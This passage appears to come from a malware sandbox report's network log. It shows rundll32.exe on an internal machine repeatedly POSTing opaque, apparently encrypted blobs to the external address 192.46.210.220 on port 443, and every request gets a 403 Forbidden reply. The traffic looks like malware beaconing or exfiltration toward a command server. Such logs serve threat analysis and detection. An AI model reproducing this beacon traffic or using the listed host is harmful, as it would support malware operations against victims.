Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:28 UTC | 224 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:29 UTC | 229 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:29 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.4 | 50001 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:32 UTC | 229 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:32 UTC | 229 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:32 UTC | 239 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:32 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.4 | 50004 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:32 UTC | 234 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:32 UTC | 234 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:33 UTC | 239 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:33 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.4 | 50023 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:36 UTC | 239 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:36 UTC | 239 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:36 UTC | 249 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:36 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.4 | 50024 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:36 UTC | 244 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:36 UTC | 244 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:36 UTC | 249 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:36 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49802 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:10 UTC | 24 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:10 UTC | 24 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:11 UTC | 29 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 192.168.2.4 | 50034 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:39 UTC | 249 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:39 UTC | 249 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:40 UTC | 259 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:40 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.2.4 | 50035 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:40 UTC | 254 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:40 UTC | 254 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:40 UTC | 259 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:40 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.2.4 | 50042 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:43 UTC | 259 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:43 UTC | 259 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:44 UTC | 269 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.2.4 | 50043 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:43 UTC | 264 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:43 UTC | 264 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:44 UTC | 269 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.2.4 | 50050 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:47 UTC | 269 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:47 UTC | 269 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:48 UTC | 279 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:48 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.2.4 | 50051 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:47 UTC | 274 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:47 UTC | 274 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:48 UTC | 279 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:48 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
56 | 192.168.2.4 | 50058 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:51 UTC | 279 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:08:51 UTC | 279 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:52 UTC | 289 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:08:52 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
57 | 192.168.2.4 | 50059 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:51 UTC | 284 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:08:51 UTC | 284 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:52 UTC | 289 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:08:52 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
58 | 192.168.2.4 | 50072 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:55 UTC | 289 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
